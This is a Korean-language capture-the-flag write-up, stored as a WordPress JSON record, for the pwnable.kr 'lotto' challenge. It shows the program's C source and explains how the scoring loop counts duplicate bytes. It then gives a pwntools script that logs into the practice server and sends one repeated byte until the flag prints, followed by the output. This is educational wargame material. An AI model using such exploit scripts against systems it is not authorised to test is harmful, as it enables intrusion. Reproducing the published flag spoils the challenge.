{"id":3263,"date":"2025-04-10T18:52:07","date_gmt":"2025-04-10T09:52:07","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3263"},"modified":"2025-04-10T18:52:21","modified_gmt":"2025-04-10T09:52:21","slug":"lotto","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3263","title":{"rendered":"lotto"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Mommy! I made a lotto program for my homework.\ndo you want to play?\n\n\nssh lotto@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>lotto.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n#include &lt;fcntl.h>\n\nunsigned char submit[6];\n\nvoid play(){\n\t\n\tint i;\n\tprintf(\"Submit your 6 lotto bytes : \");\n\tfflush(stdout);\n\n\tint r;\n\tr = read(0, submit, 6);\n\n\tprintf(\"Lotto Start!\\n\");\n\t\/\/sleep(1);\n\n\t\/\/ generate lotto numbers\n\tint fd = open(\"\/dev\/urandom\", O_RDONLY);\n\tif(fd==-1){\n\t\tprintf(\"error. tell admin\\n\");\n\t\texit(-1);\n\t}\n\tunsigned char lotto[6];\n\tif(read(fd, lotto, 6) != 6){\n\t\tprintf(\"error2. tell admin\\n\");\n\t\texit(-1);\n\t}\n\tfor(i=0; i&lt;6; i++){\n\t\tlotto[i] = (lotto[i] % 45) + 1;\t\t\/\/ 1 ~ 45\n\t}\n\tclose(fd);\n\t\n\t\/\/ calculate lotto score\n\tint match = 0, j = 0;\n\tfor(i=0; i&lt;6; i++){\n\t\tfor(j=0; j&lt;6; j++){\n\t\t\tif(lotto[i] == submit[j]){\n\t\t\t\tmatch++;\n\t\t\t}\n\t\t}\n\t}\n\n\t\/\/ win!\n\tif(match == 6){\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\");\n\t}\n\telse{\n\t\tprintf(\"bad luck...\\n\");\n\t}\n\n}\n\nvoid help(){\n\tprintf(\"- nLotto Rule -\\n\");\n\tprintf(\"nlotto is consisted with 6 random natural numbers less than 46\\n\");\n\tprintf(\"your goal is to match lotto numbers as many as you can\\n\");\n\tprintf(\"if you win lottery for *1st place*, you will get reward\\n\");\n\tprintf(\"for more details, follow the link below\\n\");\n\tprintf(\"http:\/\/www.nlotto.co.kr\/counsel.do?method=playerGuide#buying_guide01\\n\\n\");\n\tprintf(\"mathematical chance to win this game is known to be 1\/8145060.\\n\");\n}\n\nint main(int argc, char* argv[]){\n\n\t\/\/ menu\n\tunsigned int menu;\n\n\twhile(1){\n\n\t\tprintf(\"- Select Menu -\\n\");\n\t\tprintf(\"1. Play Lotto\\n\");\n\t\tprintf(\"2. Help\\n\");\n\t\tprintf(\"3. Exit\\n\");\n\n\t\tscanf(\"%d\", &amp;menu);\n\n\t\tswitch(menu){\n\t\t\tcase 1:\n\t\t\t\tplay();\n\t\t\t\tbreak;\n\t\t\tcase 2:\n\t\t\t\thelp();\n\t\t\t\tbreak;\n\t\t\tcase 3:\n\t\t\t\tprintf(\"bye\\n\");\n\t\t\t\treturn 0;\n\t\t\tdefault:\n\t\t\t\tprintf(\"invalid menu\\n\");\n\t\t\t\tbreak;\n\t\t}\n\t}\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/\/ calculate lotto score\n\tint match = 0, j = 0;\n\tfor(i=0; i&lt;6; i++){\n\t\tfor(j=0; j&lt;6; j++){\n\t\t\tif(lotto[i] == submit[j]){\n\t\t\t\tmatch++;\n\t\t\t}\n\t\t}\n\t}<\/pre>\n\n\n\n<p><code>lotto<\/code> \ubc30\uc5f4 \uacfc <code>submit<\/code> \ubc30\uc5f4\uc744 \ube44\uad50\ud574\uc11c 6\uc790\ub9ac \uc804\ubd80 \ub2e4 \ub9de\ucd94\ub3c4\ub85d \uc124\uacc4\ud588\uc5b4\uc57c\ud558\ub294\ub370 2\uc911 for\ubb38\uc744 \uc0ac\uc6a9\ud5c8\uc5ec \ubaa8\ub4e0 \uc870\ud569\uc744 \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc5d0, \uc911\ubcf5\ub41c \uc22b\uc790\uac00 \uc788\uc744 \uacbd\uc6b0 \ud558\ub098\uc758 \ubc88\ud638\uac00 \uc5ec\ub7ec \ubc88 \ub9e4\uce6d\ub418\uc5b4 \uc2e4\uc81c\ub85c\ub294 \ud55c \ubc88\ub9cc \uc77c\uce58\ud574\uc57c \ud560 \uacbd\uc6b0\uc5d0\ub3c4 \ub354 \ub9ce\uc740 \uc810\uc218\uac00 \uae30\ub85d\ub41c\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c \uc544\ub798\uc640 \uac19\uc774 <code>lotto<\/code> \uac12\uc774 \uac00\uc815\ub418\uc788\uc744\ub54c \uc81c\ucd9c\ud55c \ubc30\uc5f4 \uac12\uc774 \uc911\ubcf5\uc73c\ub85c \uacc4\uc18d \uc22b\uc790\uac00 \ub4e4\uc5b4\uac00\uba74,<br><code>match<\/code> \uac12\uc744 6\uc73c\ub85c \ub9cc\ub4e4 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>lotto<\/strong>\u00a0: [ 1 ] [ 2 ]\u00a0<strong>[ 3 ]<\/strong>\u00a0[ 4 ] [ 5 ] [ 6 ]<\/li>\n\n\n\n<li><strong>submit<\/strong>\u00a0:\u00a0<strong>[ 3 ] [ 3 ] [ 3 ] [ 3 ] [ 3 ] [ 3 ]<\/strong><\/li>\n<\/ul>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p><code>\\\\x07<\/code>\uc73c\ub85c 6\ubc88 \uc5f0\uc18d\uc73c\ub85c \ud574\uc11c <code>match<\/code> \uac12\uc774 6\uc73c\ub85c \ub418\ub3c4\ub85d \ub9de\ucd94\uc5c8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n\n# context.log_level = 'debug'\n\ns = ssh('lotto', 'pwnable.kr', 2222, 'guest')\n\nargvs = [\".\/lotto\"]\np = s.process(executable=\".\/lotto\", argv=argvs)\n\n\nwhile True: \n    p.sendlineafter(b\"3. Exit\\n\", b\"1\")\n\n    p.sendlineafter(b\"Submit your 6 lotto bytes : \", b\"\\x07\"*6)\n\n    p.recvline()\n    res = p.recvline()\n    didFail = b\"bad luck...\" in res\n    print(f\"res: {res}, didFail: {didFail}\")\n\n    if didFail:\n        continue\n    break\n\np.close()\ns.close()<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@2d0f4d9a440c:~\/pwnable.kr\/lotto$ python3 solve.py\n[+] Connecting to pwnable.kr on port 2222: Done\n[*] col@pwnable.kr:\n    Distro    Ubuntu 22.04\n    OS:       linux\n    Arch:     amd64\n    Version:  5.15.0\n    ASLR:     Enabled\n    SHSTK:    Disabled\n    IBT:      Disabled\n[+] Starting remote process '.\/lotto' on pwnable.kr: pid 696288\n[!] ASLR is disabled for '\/home\/lotto\/lotto'!\nres: b'bad luck...\\n', didFail: True\nres: b'bad luck...\\n', didFail: True\nres: b'bad luck...\\n', didFail: True\nres: b'Sorry_mom_1_Forgot_to_check_duplicates\\n', didFail: False\n[*] Stopped remote process 'lotto' on pwnable.kr (pid 696288)\n[*] Closed connection to 'pwnable.kr'<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code Analysis lotto \ubc30\uc5f4 \uacfc submit \ubc30\uc5f4\uc744 \ube44\uad50\ud574\uc11c 6\uc790\ub9ac \uc804\ubd80 \ub2e4 \ub9de\ucd94\ub3c4\ub85d \uc124\uacc4\ud588\uc5b4\uc57c\ud558\ub294\ub370 2\uc911 for\ubb38\uc744 \uc0ac\uc6a9\ud5c8\uc5ec \ubaa8\ub4e0 \uc870\ud569\uc744 \uac80\uc0ac\ud558\uae30 \ub54c\ubb38\uc5d0, \uc911\ubcf5\ub41c \uc22b\uc790\uac00 \uc788\uc744 \uacbd\uc6b0 \ud558\ub098\uc758 \ubc88\ud638\uac00 \uc5ec\ub7ec \ubc88 \ub9e4\uce6d\ub418\uc5b4 \uc2e4\uc81c\ub85c\ub294 \ud55c \ubc88\ub9cc \uc77c\uce58\ud574\uc57c \ud560 \uacbd\uc6b0\uc5d0\ub3c4 \ub354 \ub9ce\uc740 \uc810\uc218\uac00 \uae30\ub85d\ub41c\ub2e4. \ub530\ub77c\uc11c \uc544\ub798\uc640 \uac19\uc774 lotto \uac12\uc774 \uac00\uc815\ub418\uc788\uc744\ub54c \uc81c\ucd9c\ud55c \ubc30\uc5f4 \uac12\uc774 \uc911\ubcf5\uc73c\ub85c \uacc4\uc18d \uc22b\uc790\uac00 \ub4e4\uc5b4\uac00\uba74,match \uac12\uc744&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3263\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">lotto<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3263","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3263"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263\/revisions"}],"predecessor-version":[{"id":3264,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3263\/revisions\/3264"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}